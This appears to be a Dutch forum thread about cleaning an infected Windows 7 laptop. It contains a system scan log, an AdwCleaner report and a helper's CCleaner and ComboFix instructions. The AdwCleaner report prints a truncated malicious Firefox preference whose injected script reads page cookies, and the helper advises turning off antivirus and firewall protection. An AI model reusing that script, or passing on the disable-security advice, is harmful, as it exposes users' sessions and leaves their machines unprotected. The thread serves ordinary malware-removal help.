IDP01 x64 - WWW -HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes @ WWW = http://

==================== Default Settings IE - DSIE================================

DSIE - ieuinit.inf: START_PAGE="http://go.microsoft.com/fwlink/p/?LinkId

DSIE - ieuinit.inf: SEARCH_PAGE_URL="http://go.microsoft.com/fwlink/?LinkId

==================== Protocol Hijackers - PH===================================

PH00 - Handler:grooveLocalGWS -{88FED34C-F0CA-4636-A375-3CB6248B04CD} @ = Unknown # C:\Program Files(x86)\Microsoft Office\Office12\GrooveSystemServices.dll # MD5 [d8c2b95bc2353e1f18850d6b8f5dba13]

PH00 - Handler:wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324}@ = Unknown # C:\Program Files (x86)\Windows Live\PhotoGallery\AlbumDownloadProtocolHandler.dll # MD5 [41290ae21c588291f2fc9309ad38ead5]

==================== ShellServiceObjectDelayLoad - SSODL=======================

SSODL - WebCheck = {E6FB5E20-DE35-11CF-9C87-00AA005127ED}@ =

SSODL x64 - WebCheck ={E6FB5E20-DE35-11CF-9C87-00AA005127ED} @ =

==================== Extra items - EXT(Torpig/ConduitSearch) ==================

EXT00 - HKLM\SOFTWARE\AppDataLow\Software\Adobe

EXT01 - HKCU\SOFTWARE\AppDataLow\Software\Adobe

EXT01 - HKCU\SOFTWARE\AppDataLow\Software\JavaSoft

EXT01 - HKCU\SOFTWARE\AppDataLow\Software\MarkAny

EXT01 - HKCU\SOFTWARE\AppDataLow\Software\Microsoft

EXT02 - HKCR\Directory\shellex\CopyHookHandlers\Ath_CopyHook@ {8e10a039-fe03-4f9c-b7e1-c5eeeaf53735}

EXT02 - HKCR\Directory\shellex\CopyHookHandlers\FileSystem @{217FC9C0-3AEA-1069-A2DB-08002B30309D}= C:\Windows\system32\shell32.dll

EXT02 - HKCR\Directory\shellex\CopyHookHandlers\Sharing @{40dd6e20-7c17-11ce-a804-00aa003ca9f6}= C:\Windows\system32\ntshrui.dll

EXT01 x64 - HKCU\SOFTWARE\AppDataLow\Software\Adobe

EXT01 x64 - HKCU\SOFTWARE\AppDataLow\Software\JavaSoft

EXT01 x64 - HKCU\SOFTWARE\AppDataLow\Software\MarkAny

EXT01 x64 - HKCU\SOFTWARE\AppDataLow\Software\Microsoft

EXT02 x64 -HKCR\Directory\shellex\CopyHookHandlers\Ath_CopyHook @{8e10a039-fe03-4f9c-b7e1-c5eeeaf53735}= C:\Program Files (x86)\BluetoothSuite\FolderViewImpl.dll

EXT02 x64 -HKCR\Directory\shellex\CopyHookHandlers\FileSystem @ {217FC9C0-3AEA-1069-A2DB-08002B30309D}=C:\Windows\system32\shell32.dll

EXT02 x64 - HKCR\Directory\shellex\CopyHookHandlers\Sharing@ {40dd6e20-7c17-11ce-a804-00aa003ca9f6}= C:\Windows\system32\ntshrui.dll

==================== DRIVERS and SERVICES======================================

*** Win32OwnProcess ***

SERV - R2 - [AdobeARMservice] - Adobe Acrobat Update Service- c:\program files (x86)\common files\adobe\arm\1.0\armsvc.exe

SERV - R2 - [AMD External Events Utility] - AMD ExternalEvents Utility - c:\windows\system32\atiesrxx.exe

SERV - R2 - [AtherosSvc] - AtherosSvc - c:\program files(x86)\bluetooth suite\adminservice.exe

SERV - R2 - [avgwd] - AVG WatchDog - c:\program files(x86)\avg\avg2015\avgwdsvc.exe

SERV - R2 - [CronService] - Cron Service for Prey - c:\prey\platform\windows\cronsvc.exe

SERV - R2 - [CxAudMsg] - Conexant Audio Message Service -c:\windows\system32\cxaudmsg64.exe

SERV - R2 - [secunia PSI Agent] - Secunia PSI Agent -c:\program files (x86)\secunia\psi\psia.exe

SERV - R2 - [secunia Update Agent] - Secunia Update Agent -c:\program files (x86)\secunia\psi\sua.exe

SERV - R2 - [sppsvc] - Software Protection -c:\windows\system32\sppsvc.exe

SERV - R2 - [TeamViewer8] - TeamViewer 8 - c:\program files(x86)\teamviewer\version8\teamviewer_service.exe

SERV - R2 - [Virtual Router] - VirtualRouterService -c:\program files (x86)\virtual router\virtualrouterservice.exe

SERV - R2 - [wlidsvc] - Windows Live ID Sign-in Assistant -c:\program files\common files\microsoft shared\windows live\wlidsvc.exe

SERV - R2 - [WMPNetworkSvc] - Windows Media Player NetworkSharing Service - c:\program files\windows media player\wmpnetwk.exe

SERV - R2 - [WSearch] - Windows Search -c:\windows\system32\searchindexer.exe

SERV - R3 - [TrustedInstaller] - Windows Modules Installer -c:\windows\servicing\trustedinstaller.exe

SERV - S2 - [a2AntiMalware] - Emsisoft Protection Service -c:\program files (x86)\emsisoft anti-malware\a2service.exe [x]

SERV - S2 - [AVGIDSAgent] - AVGIDSAgent - c:\program files(x86)\avg\avg2015\avgidsagent.exe

SERV - S2 - [clr_optimization_v4.0.30319_32] - Microsoft.NET Framework NGEN v4.0.30319_X86 -c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe

SERV - S2 - [clr_optimization_v4.0.30319_64] - Microsoft.NET Framework NGEN v4.0.30319_X64 - c:\windows\microsoft.net\framework64\v4.0.30319\mscorsvw.exe

SERV - S2 - [gupdate] - Google Update-service (gupdate) -c:\program files (x86)\google\update\googleupdate.exe

SERV - S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash PlayerUpdate Service - c:\windows\syswow64\macromed\flash\flashplayerupdateservice.exe

SERV - S3 - [ALG] - Application Layer Gateway Service -c:\windows\system32\alg.exe

SERV - S3 - [COMSysApp] - COM+ System Application -c:\windows\system32\dllhost.exe

SERV - S3 - [ehRecvr] - Windows Media Center ReceiverService - c:\windows\ehome\ehrecvr.exe

SERV - S3 - [ehSched] - Windows Media Center SchedulerService - c:\windows\ehome\ehsched.exe

SERV - S3 - [Fax] - Fax - c:\windows\system32\fxssvc.exe

SERV - S3 - [FontCache3.0.0.0] - Windows PresentationFoundation Font Cache 3.0.0.0 -c:\windows\microsoft.net\framework64\v3.0\wpf\presentationfontcache.exe

SERV - S3 - [gupdatem] - Google Update-service (gupdatem) -c:\program files (x86)\google\update\googleupdate.exe

SERV - S3 - [gusvc] - Google Updater Service - c:\programfiles (x86)\google\common\google updater\googleupdaterservice.exe

SERV - S3 - [iEEtwCollectorService] - Internet Explorer ETWCollector Service - c:\windows\system32\ieetwcollector.exe

SERV - S3 - [Microsoft Office Groove Audit Service] -Microsoft Office Groove Audit Service - c:\program files (x86)\microsoftoffice\office12\grooveauditservice.exe

SERV - S3 - [MozillaMaintenance] - Mozilla MaintenanceService - c:\program files (x86)\mozilla maintenance service\maintenanceservice.exe

SERV - S3 - [MSDTC] - Distributed Transaction Coordinator -c:\windows\system32\msdtc.exe

SERV - S3 - [msiserver] - Windows Installer -c:\windows\system32\msiexec.exe

SERV - S3 - [odserv] - Microsoft Office Diagnostics Service- c:\program files (x86)\common files\microsoft shared\office12\odserv.exe

SERV - S3 - [ose] - Office Source Engine - c:\program files(x86)\common files\microsoft shared\source engine\ose.exe

SERV - S3 - [PerfHost] - Performance Counter DLL Host - c:\windows\syswow64\perfhost.exe

SERV - S3 - [RpcLocator] - Remote Procedure Call (RPC)Locator - c:\windows\system32\locator.exe

SERV - S3 - [sNMPTRAP] - SNMP Trap -c:\windows\system32\snmptrap.exe

SERV - S3 - [vds] - Virtual Disk - c:\windows\system32\vds.exe

SERV - S3 - [VSS] - Volume Shadow Copy -c:\windows\system32\vssvc.exe

SERV - S3 - [WatAdminSvc] - Windows ActivationTechnologies-service - c:\windows\system32\wat\watadminsvc.exe

SERV - S3 - [wbengine] - Block Level Backup Engine Service -c:\windows\system32\wbengine.exe

SERV - S3 - [wmiApSrv] - WMI Performance Adapter -c:\windows\system32\wbem\wmiapsrv.exe

SERV - S4 - [aspnet_state] - ASP.NET-statusservice -c:\windows\microsoft.net\framework64\v4.0.30319\aspnet_state.exe

SERV - S4 - [clr_optimization_v2.0.50727_32] - Microsoft.NET Framework NGEN v2.0.50727_X86 -c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe

SERV - S4 - [clr_optimization_v2.0.50727_64] - Microsoft.NET Framework NGEN v2.0.50727_X64 - c:\windows\microsoft.net\framework64\v2.0.50727\mscorsvw.exe

*** Win32ShareProcess ***

SERV - R2 - [samSs] - Security Accounts Manager -c:\windows\system32\lsass.exe

SERV - R3 - [KeyIso] - CNG Key Isolation -c:\windows\system32\lsass.exe

SERV - S3 - [EFS] - Encrypting File System (EFS) -c:\windows\system32\lsass.exe

SERV - S3 - [idsvc] - Windows CardSpace -c:\windows\microsoft.net\framework64\v3.0\windows communicationfoundation\infocard.exe

SERV - S3 - [Netlogon] - Netlogon -c:\windows\system32\lsass.exe

SERV - S3 - [ProtectedStorage] - Protected Storage -c:\windows\system32\lsass.exe

SERV - S3 - [VaultSvc] - Credential Manager -c:\windows\system32\lsass.exe

SERV - S4 - [NetMsmqActivator] - Net.Msmq Listener Adapter -c:\windows\microsoft.net\framework64\v4.0.30319\smsvchost.exe

SERV - S4 - [NetPipeActivator] - Net.Pipe Listener Adapter -c:\windows\microsoft.net\framework64\v4.0.30319\smsvchost.exe

SERV - S4 - [NetTcpActivator] - Net.Tcp Listener Adapter -c:\windows\microsoft.net\framework64\v4.0.30319\smsvchost.exe

SERV - S4 - [NetTcpPortSharing] - Net.Tcp Port SharingService - c:\windows\microsoft.net\framework64\v4.0.30319\smsvchost.exe

*** Others ***

SERV - R2 - [spooler] - Print Spooler -c:\windows\system32\spoolsv.exe

SERV - S3 - [uI0Detect] - Interactive Services Detection -c:\windows\system32\ui0detect.exe

*** File System Driver ***

DRV - R0 - [AVGIDSHA] - AVGIDSHA -C:\Windows\system32\Drivers\AVGIDSHA.sys

DRV - R0 - [Avgloga] - AVG Logging Driver -C:\Windows\system32\Drivers\Avgloga.sys

DRV - R0 - [Avgmfx64] - AVG Mini-Filter Resident Anti-VirusShield - C:\Windows\system32\Drivers\Avgmfx64.sys

DRV - R0 - [Avgrkx64] - AVG Anti-Rootkit Driver -C:\Windows\system32\Drivers\Avgrkx64.sys

DRV - R0 - [FileInfo] - File Information FS MiniFilter -C:\Windows\system32\Drivers\FileInfo.sys

DRV - R0 - [FltMgr] - FltMgr -C:\Windows\system32\Drivers\FltMgr.sys

DRV - R0 - [Mup] - Mup - C:\Windows\system32\Drivers\Mup.sys

DRV - R1 - [NetBIOS] - NetBIOS Interface -C:\Windows\system32\Drivers\NetBIOS.sys

DRV - R3 - [srv] - Stuurprogramma Server SMB 1.xxx -C:\Windows\system32\Drivers\srv.sys

DRV - R3 - [srv2] - Stuurprogramma Server SMB 2.xxx -C:\Windows\system32\Drivers\srv2.sys

*** Kernel Driver ***

DRV - R0 - [ACPI] - Microsoft ACPI-stuurprogramma -C:\Windows\system32\Drivers\ACPI.sys

DRV - R0 - [amd_sata] - amd_sata -C:\Windows\system32\Drivers\amd_sata.sys

DRV - R0 - [amd_xata] - amd_xata -C:\Windows\system32\Drivers\amd_xata.sys

DRV - R0 - [amdxata] - amdxata -C:\Windows\system32\Drivers\amdxata.sys

DRV - R0 - [atapi] - IDE-kanaal -C:\Windows\system32\Drivers\atapi.sys

DRV - R0 - [CLFS] - Common Log (CLFS) -C:\Windows\system32\Drivers\CLFS.sys [x]

DRV - R0 - [CNG] - CNG - C:\Windows\system32\Drivers\CNG.sys

DRV - R0 - [Compbatt] - Microsoft Composite Battery-stuurprogramma- C:\Windows\system32\Drivers\Compbatt.sys

DRV - R0 - [Disk] - Stuurprogramma voor schijfstations -C:\Windows\system32\Drivers\Disk.sys

DRV - R0 - [fvevol] - FilterstuurprogrammaBitlocker-stationsvergrendeling - C:\Windows\system32\Drivers\fvevol.sys

DRV - R0 - [hwpolicy] - Hardware Policy Driver -C:\Windows\system32\Drivers\hwpolicy.sys

DRV - R0 - [iusb3hcs] - Intel® USB 3.0hostcontrollerswitch-stuurprogramma - C:\Windows\system32\Drivers\iusb3hcs.sys

DRV - R0 - [KSecDD] - KSecDD - C:\Windows\system32\Drivers\KSecDD.sys

DRV - R0 - [KSecPkg] - KSecPkg -C:\Windows\system32\Drivers\KSecPkg.sys

DRV - R0 - [mountmgr] - Koppelpuntbeheer -C:\Windows\system32\Drivers\mountmgr.sys

DRV - R0 - [msahci] - msahci - C:\Windows\system32\Drivers\msahci.sys

DRV - R0 - [msisadrv] - msisadrv -C:\Windows\system32\Drivers\msisadrv.sys

DRV - R0 - [NDIS] - NDIS-systeemstuurprogramma -C:\Windows\system32\Drivers\NDIS.sys

DRV - R0 - [partmgr] - Partitiebeheer -C:\Windows\system32\Drivers\partmgr.sys

DRV - R0 - [pci] - PCI Bus-stuurprogramma -C:\Windows\system32\Drivers\pci.sys

DRV - R0 - [pcw] - Performance Counters for Windows Driver -C:\Windows\system32\Drivers\pcw.sys

DRV - R0 - [rdyboost] - ReadyBoost -C:\Windows\system32\Drivers\rdyboost.sys

DRV - R0 - [spldr] - Security Processor Loader Driver -C:\Windows\system32\Drivers\spldr.sys

DRV - R0 - [storflt] - Schijf - Filterstuurprogramma voorVirtual Machine-busaccelerator - C:\Windows\system32\Drivers\storflt.sys [x]

DRV - R0 - [Tcpip] - Stuurprogramma voor TCP/IP-protocol -C:\Windows\system32\Drivers\Tcpip.sys

DRV - R0 - [vdrvroot] - Microsoft Virtual DriveEnumerator-stuurprogramma - C:\Windows\system32\Drivers\vdrvroot.sys

DRV - R0 - [volmgr] - Stuurprogramma voor Volumebeheer -C:\Windows\system32\Drivers\volmgr.sys

DRV - R0 - [volmgrx] - Dynamisch Volumebeheer -C:\Windows\system32\Drivers\volmgrx.sys

DRV - R0 - [volsnap] - Opslagvolumes -C:\Windows\system32\Drivers\volsnap.sys

DRV - R0 - [Wd] - Microsoft Watchdog Timer-stuurprogramma -C:\Windows\system32\Drivers\Wd.sys

DRV - R0 - [Wdf01000] - Kernel Mode Driver Frameworksservice - C:\Windows\system32\Drivers\Wdf01000.sys

DRV - R1 - [AFD] - Ancillary Function Driver for Winsock -C:\Windows\system32\Drivers\AFD.sys

DRV - R1 - [beep] - Beep - C:\Windows\system32\Drivers\Beep.sys

DRV - R1 - [tdx] - Stuurprogramma voor ondersteuning vanNetIO Legacy TDI - C:\Windows\system32\Drivers\tdx.sys

DRV - R2 - [tcpipreg] - TCP/IP Registry Compatibility -C:\Windows\system32\Drivers\tcpipreg.sys

==================== SvcHost - White Listed====================================

All Ok

WOW - All Ok

==================== SigCheck x86 Fast=========================================

Fast Scan All ok

==================== SigCheck x64 Fast =========================================

Fast Scan All ok

==================== Job tasks=================================================

There are no .job files found.

==================== End scanning at ma 1 dec 2014 17:24 (0Min 35 Sec ) =======

# AdwCleaner v4.103 - Rapport aangemaakt 01/12/2014 op18:26:20

# Laatste Update 01/12/2014 door Xplode

# Database : 2014-12-01.2 [Live]

# Besturingssysteem : Windows 7 Ultimate Service Pack 1 (64bits)

# Gebruikersnaam : Jordan - ACER-LAPTOP

# Gestart vanuit :C:\Users\Jordan\Desktop\adwcleaner_4.103.exe

# Optie : Scannen

***** [ Services ] *****

***** [ Bestanden / Mappen ] *****

Map Gevonden :C:\Users\Jordan\AppData\Roaming\Mozilla\Firefox\Profiles\aksqjff7.default\Extensions\O@bHpatKv.com

***** [ Taken ] *****

***** [ Snelkoppelingen ] *****

***** [ Register ] *****

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17420

-\\ Mozilla Firefox v33.1 (x86 nl)

[aksqjff7.default] - Regel gevonden :user_pref("extensions.ZkREesY6Zt66B0Tr.scode","try{(function(){try{var url=(window.self.location.href +document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.index[...]

-\\ Comodo Dragon v

*************************

AdwCleaner[R0].txt - [772 octets] - [21/10/2013 07:12:57]

AdwCleaner[R1].txt - [3373 octets] - [17/11/2013 08:53:05]

AdwCleaner[R2].txt - [2903 octets] - [30/11/2014 10:43:33]

AdwCleaner[R3].txt - [2906 octets] - [30/11/2014 10:44:10]

AdwCleaner[R4].txt - [2964 octets] - [30/11/2014 10:53:51]

AdwCleaner[R5].txt - [1523 octets] - [01/12/2014 17:06:50]

AdwCleaner[R6].txt - [1643 octets] - [01/12/2014 18:19:40]

AdwCleaner[R7].txt - [1443 octets] - [01/12/2014 18:26:20]

AdwCleaner[s0].txt - [3851 octets] - [17/11/2013 08:53:56]

AdwCleaner[s1].txt - [1601 octets] - [01/12/2014 17:13:12]

########## EOF - C:\AdwCleaner\AdwCleaner[R7].txt - [1623octets] ##########

Ik krijg geen log van mbam ik zie geen knop van exporteer

[Gast Emphyrio]

Kan je de standaard lettergrootte ongewijzigd laten aub ?

---

Download of Update Ccleaner

Start CCleaner op.

• Run Ccleaner en klik in de linkse kolom op Opties
  
• Selecteer het tabblad Geavanceerd
  
• Haal het vinkje weg voor Verwijder alleen bestanden in Windows Temp-systeemmap die ouder zijn dan 24 uur
  
• Selecteer het tabblad Instellingen
  
• Haal het vinkje weg bij "Computer automatisch schoonmaken...."
  
• Klik in de linkse kolom op Cleaner.
  
• Klik dan achtereenvolgens op Analyseer en Schoonmaken.
  
• Klik vervolgens in de linkse kolom op Register
  
• Klik op Scan naar problemen.
  
• Op de vraag of je een backup wil maken van het register, klik je "Ja".
  
• Als er fouten gevonden worden klik je op de middelste knop: Herstel alle geselecteerde fouten en OK
  

---

Download Combofix naar je bureaublad.

(Dus niet naar een download map of temp map)

Extra nota... Zorg ervoor dat je Security software uitschakeld is tijdens het gebruik van Combofix.

Dit omdat deze scanners bepaalde componenten die Combofix gebruikt, onterecht zien als geïnfecteerd en Combofix zullen blokkeren.

Kijk hier indien je niet weet hoe je je Antivirus, Firewall en/of Antispywarescanner moet uitschakelen.

Sluit ALLE vensters, ook je browser en laat Combofix rustig zijn werk doen.

Open dus geen andere applicaties totdat Combofix de log heeft gepresenteert.

Als Combofix vraagt om een update, dan staat je dit toe.

Wanneer ComboFix klaar is met scannen, dit kan eventueel na een reboot zijn, opent er een logfile (combofix.txt).

Deze kan je vinden als C:\combofix.txt.

Post het Combofixlogje samen met een nieuw DDS logje in je volgende antwoord.

* OPMERKING: Indien je één van de onderstaande meldingen krijgt na het gebruik van ComboFix, herstart dan de computer.

• Er is geprobeerd een ongeldige bewerking uit te voeren op een registersleutel die is gemarkeerd voor verwijdering.
  
• Illegal operation attempted on a registry key that has been marked for deletion.